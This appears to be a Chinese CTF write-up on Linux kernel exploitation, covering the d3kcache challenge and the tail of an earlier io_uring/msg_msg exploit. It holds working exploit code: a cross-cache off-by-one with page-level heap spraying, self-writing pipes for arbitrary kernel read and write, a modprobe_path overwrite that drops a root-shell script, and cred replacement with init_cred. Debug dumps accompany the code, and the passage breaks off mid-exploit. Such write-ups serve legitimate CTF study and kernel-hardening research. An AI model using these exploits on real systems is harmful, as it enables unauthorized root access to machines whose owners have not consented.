    puts("submit_provide_buffer");

    uint64_t* tag = (uint64_t*)(buffer + 0xF00);
    *tag = 0xdeadbeef;
    pthread_t th;
    pthread_create(&th, NULL, worker, buffer);

    /*
     * Wait until the worker's msgrcv() has overwritten the sentinel. The
     * location is modified behind the compiler's back, so it must be read
     * through a volatile lvalue; otherwise the loop may be compiled into an
     * unconditional infinite loop.
     */
    while (*(volatile uint64_t*)tag == 0xdeadbeef) {
    }

    /* The leaked pointer refers to ctx->io_bl[0x21], i.e. chunk base + 0x420. */
    uint64_t io_bl = *((uint64_t*)(buffer + 0x18)) - 0x420;
    printf("io_bl = 0x%lx\n",io_bl);

    /* Stage 3: place a fresh msg_msg and a second io_ring_ctx after the chunk. */
    msg_len = 0x800 - 0x30;
    memset(msg->mtext, 0x00, msg_len);
    msgsnd(msgid[2], msg, msg_len, 0);

    int spray_uring_fd;
    struct io_uring_params p;
    memset(&p, 0, sizeof(p));
    spray_uring_fd = io_uring_setup(0x1, &p);

    /* Release the UAF msg_msg so the chunk can be refilled with forged lists. */
    ret = msgrcv(msgid[0], buffer, PAGE_SIZE, (long)0x0001, 0);

/* Convert an offset inside the chunk into an index into mtext. */
#define IDX(x) (((x)-0x30) / 8)

    uint64_t* tmp = (uint64_t*)msg->mtext;
    tmp[IDX(0x40)] = io_bl + 0x60;      /* fake_bl.buf_pages */
    tmp[IDX(0x48)] = io_bl;             /* fake_bl.buf_ring (readable memory) */
    tmp[IDX(0x50)] = 0x10000;           /* fake_bl.buf_nr_pages = 1 */
    tmp[IDX(0x60)] = io_bl + 0x68;      /* treated as buf_pages[0] */
    tmp[IDX(0x68)] = 0xdeadbeef;        /* treated as the page object */

    tmp[IDX(0x80)] = io_bl + 0xa0;      /* fake_bl.buf_pages */
    tmp[IDX(0x88)] = io_bl;             /* fake_bl.buf_ring (readable memory) */
    tmp[IDX(0x90)] = 0x10000;           /* fake_bl.buf_nr_pages = 1 */
    tmp[IDX(0xa0)] = io_bl + 0x1000;    /* treated as buf_pages[0] */

    msg_len = 0x800 - 0x30;
    ret = msgsnd(msgid[1], msg, msg_len, 0);

    /* Unregistering group 2 makes the kernel kvfree() the forged buf_pages. */
    struct io_uring_buf_reg reg;
    memset(&reg, 0, sizeof(reg));
    reg.bgid = 0x2;
    ret = io_uring_register(uring_fd, IORING_UNREGISTER_PBUF_RING, &reg, 1);

    /*
     * Stage 4: the next message is allocated at chunk + 0x60 and overlaps the
     * msg_msg sent on msgid[2]; forge that header with an enlarged m_ts.
     */
    tmp = (uint64_t*)msg->mtext;
    tmp[IDX(0x420 - 0x60)] = io_bl + 0x420;     /* keeps the worker stuck instead of crashing */

    tmp[IDX(0x800 - 0x60)] = io_bl + 0x830;     /* fake_msg.m_list, first word */
    tmp[IDX(0x808 - 0x60)] = io_bl + 0x830;     /* fake_msg.m_list, second word */
    tmp[IDX(0x810 - 0x60)] = 0x00001;           /* fake_msg.m_type */
    tmp[IDX(0x818 - 0x60)] = 0xFD0;             /* fake_msg.m_ts */
    tmp[IDX(0x820 - 0x60)] = 0;                 /* fake_msg.next */
    tmp[IDX(0x828 - 0x60)] = io_bl + 0x840;     /* fake_msg.security (readable memory) */
    tmp[IDX(0x830 - 0x60)] = io_bl + 0x800;     /* fake circular list node */
    tmp[IDX(0x838 - 0x60)] = io_bl + 0x800;
    tmp[IDX(0x840 - 0x60)] = 0xdeadbeef;

    msg_len = 0x800 - 0x30;
    ret = msgsnd(msgid[3], msg, msg_len, 0);

    /* Over-read past the forged message into the adjacent io_ring_ctx. */
    msgrcv(msgid[2], buffer, PAGE_SIZE, (long)0x0001, 0);
    uint64_t* io_ring_ctx = (uint64_t*)(buffer + 0x8 + 0x800 - 0x30);

    kernel_offset = io_ring_ctx[0x420 / 8] - 0xffffffff810a8470;
    kernel_base = kernel_offset + 0xffffffff81000000;
    uint64_t modprobe_path = kernel_offset + 0xFFFFFFFF82E51260;

    printf("io_ring_ctx->fallback_work: 0x%lx\n",io_ring_ctx[0x420 / 8]);
    printf("kernel_offset: 0x%lx\n",kernel_offset);
    printf("kernel_base: 0x%lx\n",kernel_base);
    printf("modprobe_path: 0x%lx\n",modprobe_path);

    /* Stage 5: repeat the overlap, this time corrupting m_list for the unlink write. */
    msg_len = 0x800 - 0x30;
    memset(msg->mtext, 'a', msg_len);
    msgsnd(msgid[4], msg, msg_len, 0);

    ret = msgrcv(msgid[3], buffer, msg_len, /* msg_type= */ (long)0x0001, 0);

    tmp = (uint64_t*)msg->mtext;
    tmp[IDX(0x420 - 0x60)] = io_bl + 0x420;

    tmp[IDX(0x800 - 0x60)] = modprobe_path - 0x8;   /* fake_msg.m_list, first word */
    tmp[IDX(0x808 - 0x60)] = 0x612f706d742f;        /* fake_msg.m_list, second word: "/tmp/a" */
    tmp[IDX(0x810 - 0x60)] = 0x00001;               /* fake_msg.m_type */
    tmp[IDX(0x818 - 0x60)] = 0xFD0;                 /* fake_msg.m_ts */
    tmp[IDX(0x820 - 0x60)] = 0;                     /* fake_msg.next */
    tmp[IDX(0x828 - 0x60)] = io_bl + 0x840;         /* fake_msg.security (readable memory) */

    msg_len = 0x800 - 0x30;
    msgsnd(msgid[5], msg, msg_len, 0);
    puts("try to msg unlink attack");

    /* Receive in a child process: unlinking the forged message performs the write. */
    if (fork() == 0) {
        msgrcv(msgid[4], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
    }

    sleep(2);
    int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
    read(fd, buffer, 0x10);
    puts(buffer);
    close(fd);

    /* open() with O_CREAT requires an explicit mode argument. */
    fd = open("/tmp/a", O_RDWR|O_CREAT, 0755);
    char *script = "#!/bin/sh\nchmod 777 /flag\nsetsid cttyhack setuidgid 0 /bin/sh\n";
    write(fd, script, strlen(script));
    close(fd);
    system("chmod 777 /tmp/a");

    /* A file with an unrecognized header; executing it presumably makes the kernel run modprobe_path. */
    int ff = open("/tmp/asd", O_WRONLY | O_CREAT, 0755);
    write(ff, "\xff\xff\xff\xff", 4);
    close(ff);

    system("chmod 777 /tmp/asd; /tmp/asd");
    if (fork() == 0)
        system("/bin/sh");

    puts("alive");
    while (1)
        ;

    return 0;
}

d3kcache

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/bash
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-hda ./rootfs.img \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 root=/dev/sda rw rdinit=/sbin/init kaslr pti=on quiet oops=panic panic=1" \
-no-reboot \
-s
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/bin/sh
chown -R root:root /
chmod 700 /root
chown -R ctf:ctf /home/ctf
chown root:root /root/flag
chmod 600 /root/flag

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
mkdir /dev/pts
mount -t devpts devpts /dev/pts

echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict

insmod /root/d3kcache.ko
chmod 666 /dev/d3kcache

cat /root/banner
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"

cd /home/ctf
setsid cttyhack su ctf -c /bin/sh
#setsid cttyhack setuidgid 1000 sh

poweroff -d 0 -f
  • dmesg_restrict
  • kptr_restrict
1
2
3
4
CONFIG_CFI_CLANG=y # 开启Control-Flow Integrity控制流完整性(内核ROP失效)
CONFIG_MEMCG=y # 开启内存控制器(GFP_KERNEL和GFP_ACCOUNT之间存在隔离)
CONFIG_SLAB_FREELIST_RANDOM=y # 开启slab freelist随机化
CONFIG_SLAB_FREELIST_HARDENED=y

漏洞分析

漏洞点如下:

1
2
3
4
5
if ( !copy_from_user(kdata, ptr, size) )
{
kdata[size] = 0; // 末尾置空,off-by-one
re = 0LL;
}
  • 内核 off-by-one

程序的 kmem_cache 是独立的:

1
2
3
4
5
6
7
if ( (unsigned __int64)module_device < 0xFFFFFFFFFFFFF001LL )
{
printk(&unk_A66);
spin = 0;
kcache_jar = kmem_cache_create_usercopy("kcache_jar", 2048LL, 0LL, 67379200LL, 0LL, 2048LL, 0LL);
memset(kcache_list, 0, 0x100uLL);
}
  • 只能考虑 cross-cache overflow

页级堆风水

页级堆风水即以内存页为粒度的内存排布方式,这种利用手法实际上是让我们手工构造一个新的已知的页级粒度内存页排布

从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的,由此我们可以:

  • 向 buddy system 请求两份连续的内存页
  • 释放其中一份内存页,在 vulnerable kmem_cache 上堆喷,让其取走这份内存页
  • 释放另一份内存页,在 victim kmem_cache 上堆喷,让其取走这份内存页

接下来利用内核模块的 off-by-one 就可能溢出到其他的内核结构体上

可以使用如下方案来构建页级堆风水:

  • 创建一个 protocol 为 PF_PACKET 的 socket
  • 调用 setsockopt 将 PACKET_VERSION 设为 TPACKET_V1 或者 TPACKET_V2
  • 调用 setsockopt 提交一个 PACKET_TX_RING

此时便存在如下调用链:

1
__sys_setsockopt() -> sock->ops->setsockopt() -> packet_setsockopt() -> packet_set_ring() -> alloc_pg_vec()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Kernel source quoted by the article; reached from packet_set_ring()
 * according to the call chain shown above it.
 *
 * Allocates an array of req->tp_block_nr struct pgv entries and fills each
 * entry's buffer with one allocation from alloc_one_pg_vec_page(order).
 * Returns the array, or NULL if the array or any block could not be
 * allocated (blocks already obtained are released via free_pg_vec()).
 */
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

/* The pointer array itself comes from the slab allocator. */
pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

/* One allocation of the requested order per block. */
for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}
  • 用以分配 tp_block_nr 份 2^order 内存页(其中 order 由 tp_block_size 决定)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Kernel source quoted by the article.
 *
 * Obtains one zeroed buffer of 2^order pages. Tries __get_free_pages() with
 * __GFP_NORETRY first, then vzalloc(), then __get_free_pages() again without
 * __GFP_NORETRY. Returns the buffer, or NULL if all three attempts fail.
 */
static char *alloc_one_pg_vec_page(unsigned long order)
{
char *buffer;
gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP |
__GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY;

/* First choice: pages straight from the page allocator. */
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* __get_free_pages failed, fall back to vmalloc */
buffer = vzalloc(array_size((1 << order), PAGE_SIZE));
if (buffer)
return buffer;

/* vmalloc failed, lets dig into swap here */
gfp_flags &= ~__GFP_NORETRY;
buffer = (char *) __get_free_pages(gfp_flags, order);
if (buffer)
return buffer;

/* complete and utter failure */
return NULL;
}
  • 直接调用 __get_free_pages() 向 buddy system 请求内存页,因此可以利用该函数进行大量的页面请求

自写管道

当我们创建一个管道时,在内核中会生成16个连续的 pipe_buffer 结构体,申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object

1
2
3
4
5
6
7
/*
 * Kernel structure quoted by the article. `page` is the first member, which
 * is why overwriting the low bytes of a pipe_buffer changes the page it
 * refers to.
 */
struct pipe_buffer {
struct page *page; /* page backing this buffer; the field the technique hijacks */
unsigned int offset, len; /* presumably the data window inside the page -- confirm against kernel headers */
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
  • pipe 系统调用提供了 fcntl(F_SETPIPE_SZ) 让我们可以重新分配 pipe_buffer 并指定其数量

自写管道的核心就是劫持 pipe_buffer->page,使该 page 结构体映射 pipe_buffer 本身所在的物理页面,通过多个这样的自写管道就可以构造出一个近乎无限制的任意读写系统

内核结构体 pipe_buffer 的第一个条目为 page,覆盖其低位就可能导致 page 重叠:

  • 覆盖低位后,pipe_buffer1-1->page 和 pipe_buffer1-2->page 指向同一个 page

1700041832088

接下来就可以利用 UAF pipe_buffer 来泄露数据:

  • 释放 UAF pipe_buffer(4k的缓冲页也会被释放,释放之后数据不会清除仍然可读写)
  • 使用 fcntl(F_SETPIPE_SZ) 重新分配 pipe_buffer,部分的 pipe_buffer 就会被申请到之前我们释放的4k缓冲页上
  • 利用 UAF 对4k缓冲页进行读取就可以泄露地址

1700043734977

修改可控的 pipe_buffer2->page,即可完成二级 UAF:

  • 利用之前的 UAF 可以修改 pipe_buffer2-1->page,使 pipe_buffer2-1->page 和 pipe_buffer2-2->page 指向同一个 page,构成二级 UAF

1700044287875

用同样的方法将 pipe_buffer3 申请到4k缓冲页上,并利用二级 UAF 将 pipe_buffer3->page 覆盖为 pipe_buffer2->page

  • 由于 pipe_buffer2->page 映射 pipe_buffer3 所在的物理页面,现在 pipe_buffer3 成为 self-writing pipe

1700045029863

接着构造另外两个 self-writing pipe,直到将3个 pipe_buffer 修改为 self-writing pipe(执行 write(pipe_list[target][1]) 可以修改 pipe_buffer 本身)

  • 这3个 self-writing pipe 在同一个页面上,并且它们的 pipe_buffer->page 都映射这个页面

之后就可以进行 RAA 和 WAA 了,这里我们使用三个管道:

  • self-writing pipe1:用以进行内存空间中的任意读写,我们通过修改其 page 指针完成
  • self-writing pipe2:用以修改 self-writing pipe3,使其写入的起始位置指向 self-writing pipe1
  • self-writing pipe3:用以修改 self-writing pipe1 与 self-writing pipe2,使得 self-writing pipe1 的 page 指针指向指定位置,self-writing pipe2 的写入起始位置指向 self-writing pipe3

入侵思路

先利用 setsockopt 构建好页级堆风水

在准备阶段,分别在 socket_fd 中部署好大量 1 页、4 页、8 页(order-0、order-2、order-3)的页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/*
 * Pre-spray page allocations through alloc_page() in three sizes: 0x1000,
 * 0x1000 * 4 and 0x1000 * 8 bytes.
 *
 * While spraying the 8-page group, earlier 4-page and 1-page allocations are
 * released at fixed intervals with free_page(), so that the objects named in
 * the inline comments can take those pages instead of disturbing the 8-page
 * allocations. A failed allocation is only reported; spraying continues.
 * The order of calls is the point of this function and must be kept.
 */
void prepare_pgv_pages(void)
{
/**
* We want a more clear and continuous memory there, which require us to
* make the noise less in allocating order-3 pages.
* So we pre-allocate the pages for those noisy objects there.
*/
puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
if (alloc_page(i, 0x1000, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

/* spray 8 pages for page-level heap fengshui */
puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
/* a socket need 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 page*/
if (i % 19 == 0) {
free_page(pgv_4pages_start_idx++);
}

/* a socket need 1 dentry: dentry, 21 objs for 1 slub on 1 page */
if (i % 21 == 0) {
/* the index is advanced by 2 before use, so every other 1-page slot is released */
free_page(pgv_1page_start_idx += 2);
}

/* a pgv need 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page*/
if (i % 512 == 0) {
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("");
}
  • alloc_page 用于申请页面
  • free_page 用于释放页面

先释放高阶的页面,然后申请低阶的页面,在伙伴系统的分配下低阶页面大概率是物理连续的

利用这个方法部署连续的 pipe_buffer,然后在中间镶嵌一段内核模块申请的可控页面:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
/* First half of the pipes: release one 8-page allocation for every 8 pipes, then resize each pipe. */
for (int i = 0; i < PIPE_NUM/2; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++); // 8 * 4k
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

/* Release one more 8-page allocation and fill it with 16 objects from the vulnerable module. */
free_page(pgv_8pages_start_idx++); // 8 * 4k
for (int i = 0; i < 0x10; i++) { // 16 * 2k
add(i, 8, "11111111");
}

/* Second half of the pipes, same pattern as the first half. */
for (int i = PIPE_NUM/2; i < PIPE_NUM; i++) {
/* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
if (i % 8 == 0) {
free_page(pgv_8pages_start_idx++);
}

/* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
printf("[x] failed to extend %d pipe!\n", i);
return -1;
}
}

触发 off-by-one,大概率会触发 cross-cache overflow 进而覆盖 pipe_buffer->page 的低位

此时两个 pipe_buffer->page 指向同一个 page,可以利用上述方法构造3个自写管道(详情见之前的博客)

构造完成后,调试信息如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
00:00000xffff888007267000 —▸ 0xffffea00001c9180 ◂— 0xfffffc0000000 
01:00080xffff888007267008 ◂— 0x24 /* '$' */
02:00100xffff888007267010 ◂— 0x0
03:00180xffff888007267018 ◂— 0x10
04:00200xffff888007267020 ◂— 0x0
... ↓ 3 skipped
08:00400xffff888007267040 ◂— 0x0
... ↓ 7 skipped
10:00800xffff888007267080 ◂— 0x0
... ↓ 7 skipped
18:00c0│ 0xffff8880072670c0 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe1 */
19:00c8│ 0xffff8880072670c8 ◂— 0xb8000000c8
1a:00d0│ 0xffff8880072670d0 —▸ 0xffffffff82451b30 ◂— 0x0
1b:00d8│ 0xffff8880072670d8 ◂— 0x10
1c:00e00xffff8880072670e0 ◂— 0x0
1d:00e80xffff8880072670e8 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
20:01000xffff888007267100 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
28:01400xffff888007267140 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
30:01800xffff888007267180 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe2 */
31:01880xffff888007267188 ◂— 0x240
32:01900xffff888007267190 —▸ 0xffffffff82451b30 ◂— 0x0
33:01980xffff888007267198 ◂— 0x10
34:01a0│ 0xffff8880072671a0 ◂— 0x0
35:01a8│ 0xffff8880072671a8 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 2 skipped
38:01c0│ 0xffff8880072671c0 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 7 skipped
40:02000xffff888007267200 ◂— 0x6d6d6d6d6d6d6d6d ('mmmmmmmm')
... ↓ 7 skipped
48:02400xffff888007267240 —▸ 0xffffea00001c99c0 ◂— 0xfffffc0000200 /* self-writing pipe3 */
49:02480xffff888007267248 ◂— 0xe0000000c8
4a:02500xffff888007267250 —▸ 0xffffffff82451b30 ◂— 0x0
  • self-writing pipe1:偏移为 0xc0
  • self-writing pipe2:偏移为 0x180
  • self-writing pipe3:偏移为 0x240

构造好 RAA 与 WAA 原语后,便可以从后往前扫描内存,同时泄露 vmemmap_base 和 kernel_base

进行任意读写之前,都需要先将物理地址转化为对应 page 结构体的地址,转换函数如下:

1
2
3
4
5
6
7
8
/*
 * Translate an address inside the direct mapping into the address of the
 * entry that describes its page in the vmemmap array.
 *
 * The address is rounded down to a 0x1000 boundary, turned into a page index
 * relative to page_offset_base, and scaled by 0x40 (the per-page entry size
 * used by this exploit) from vmemmap_base.
 */
size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    size_t page_start = direct_map_addr & (~0xfff);
    size_t page_index = (page_start - page_offset_base) / 0x1000;

    return vmemmap_base + page_index * 0x40;
}

从前往后扫描内存,查找并尝试将 current_task->cred 覆盖为 init_cred

  • 调试时可以通过解引用 task_struct->parent(offset=309*8) 的方式向上一直找到 init 进程(init->parent 指向自身,利用这一点可以定位 init 进程)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

/* Number of pipes created by main(); also the first dimension of pipe_list. */
#define PIPE_NUM 200
/* 96 bytes; main() notes this as "2 * pipe_buffer = 0x60 kmalloc-96". */
#define SND_PIPE_BUF_SZ 96
/* 192 bytes; main() notes this as "4 * pipe_buffer = 0xc0 kmalloc-192". */
#define TRD_PIPE_BUF_SZ 192

/* Indices into pipe_list chosen by main(); -1 until the matching pipe is found. */
int self_4th_pipe_idx = -1;
int self_2nd_pipe_idx = -1;
int self_3rd_pipe_idx = -1;
/* pipe_buffer templates written through the pipes above by the read/write helpers. */
struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
/* Zero filler used to pad a written pipe_buffer up to TRD_PIPE_BUF_SZ bytes. */
char temp_zero_buf[0x1000] = {'\0'};

/* pipe_list[i][0] is the read end and pipe_list[i][1] the write end, as filled by pipe(). */
int pipe_list[PIPE_NUM][2];

/* File descriptor of the device opened in main(); target of the ioctl wrappers. */
int fd;
/* Argument block passed by pointer to every ioctl issued on fd. */
struct argg {
int index;
int size;
char* data;
};

int add(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x114, &arg);
}

int dele(int index){
struct argg arg = {.index = index};
return ioctl(fd, 0x810, &arg);
}

int kwrite(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x514, &arg);
}

int kread(int index,int size,char *data){
struct argg arg = {.size = size,.index = index,.data = data};
return ioctl(fd, 0x1919, &arg);
}

/*
 * Read from the page described by page_to_read into dst, using the three
 * pipes selected in main() (self_2nd/3rd/4th_pipe_idx).
 *
 * Sequence as written below: point evil_2nd_buf at page_to_read, write
 * evil_4th_buf through the 3rd pipe, write evil_2nd_buf (zero-padded to
 * TRD_PIPE_BUF_SZ bytes) and then evil_3rd_buf through the 4th pipe, and
 * finally read 0xfff bytes from the 2nd pipe into dst.
 * NOTE(review): presumably each of these pipes' data page aliases another
 * pipe's pipe_buffer array, so every write rewrites a pipe_buffer in place;
 * confirm against the setup performed in main().
 *
 * dst must have room for at least 0xfff bytes. The results of write() and
 * read() are not checked.
 */
void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
/* describe the target page: start at offset 0 with 0x1ff8 bytes marked as present */
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
/* pad the rest of the TRD_PIPE_BUF_SZ-byte slot with zeroes */
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

read(pipe_list[self_2nd_pipe_idx][0], dst, 0xfff);
}

/*
 * Write len bytes from src to the page described by page_to_write, using the
 * three pipes selected in main() (self_2nd/3rd/4th_pipe_idx).
 *
 * Same sequence as arbitrary_read_by_pipe(), except that evil_2nd_buf is set
 * up with offset 0 and len 0 and the final step writes src into the 2nd pipe
 * instead of reading from it.
 * NOTE(review): presumably len 0 makes the pipe look empty so the data lands
 * at the start of the page; confirm against the pipe write path.
 *
 * The results of write() are not checked.
 */
void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
/* pad the rest of the TRD_PIPE_BUF_SZ-byte slot with zeroes */
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

write(pipe_list[self_2nd_pipe_idx][1], src, len);
}

/**
 * Entry point of the /dev/d3kcache challenge solution.
 *
 * Stages, in the order they run:
 *   1. set up the environment (saved user context, CPU 0, new namespaces,
 *      device fd, pgv spray helper) and create PIPE_NUM pipes;
 *   2. resize the pipes around 0x10 device objects, tag every pipe, and use
 *      kwrite() on the device objects until two pipes report the same page;
 *   3. repeat the "two pipes share one page" step twice more with smaller
 *      pipe_buffer arrays (SND_PIPE_BUF_SZ, then TRD_PIPE_BUF_SZ) until three
 *      self-writing pipes are found;
 *   4. use arbitrary_read_by_pipe()/arbitrary_write_by_pipe() to locate the
 *      kernel base and the current task, then replace its cred/nsproxy
 *      pointers with the init ones and spawn a shell.
 *
 * Returns -1 if a pipe cannot be resized; fatal errors go through err_exit().
 * On success the process is replaced by the shell started in get_root_shell().
 */
int main(int argc , char **argv, char **envp){
    /*
     * Scratch buffer, two pages long. The last stage reads the page holding
     * the task_struct into buf[0..] and the following page into buf[0x1000..];
     * with a single-page buffer that second read overran the stack.
     */
    char buf[0x2000]= {'\0'};

    (void)argc;
    (void)argv;
    (void)envp;

    save_status();
    bind_core(0);
    unshare_setup();

    fd = open("/dev/d3kcache", O_RDWR);
    if (fd < 0)
        err_exit("open /dev/d3kcache");

    prepare_pgv_system();
    prepare_pgv_pages();

    for(int i = 0; i < PIPE_NUM; i++){
        if(pipe(pipe_list[i]) == -1){
            err_exit("pipe");
        }
    }

    /* first half of the pipes, placed before the device objects */
    for (int i = 0; i < PIPE_NUM/2; i++) {
        /* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
        if (i % 8 == 0) {
            free_page(pgv_8pages_start_idx++); // 8 * 4k
        }

        /* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
        if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
            printf("[x] failed to extend %d pipe!\n", i);
            return -1;
        }
    }

    /* device objects, allocated between the two halves of the pipe spray */
    free_page(pgv_8pages_start_idx++); // 8 * 4k
    for (int i = 0; i < 0x10; i++) { // 16 * 2k
        add(i, 8, "11111111");
    }

    /* second half of the pipes, placed after the device objects */
    for (int i = PIPE_NUM/2; i < PIPE_NUM; i++) {
        /* let the pipe_buffer to be allocated on order-3 pages (kmalloc-4k) */
        if (i % 8 == 0) {
            free_page(pgv_8pages_start_idx++);
        }

        /* a pipe_buffer on 1k is for 16 pages, so 4k for 64 pages */
        if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) { // 8 * 4k
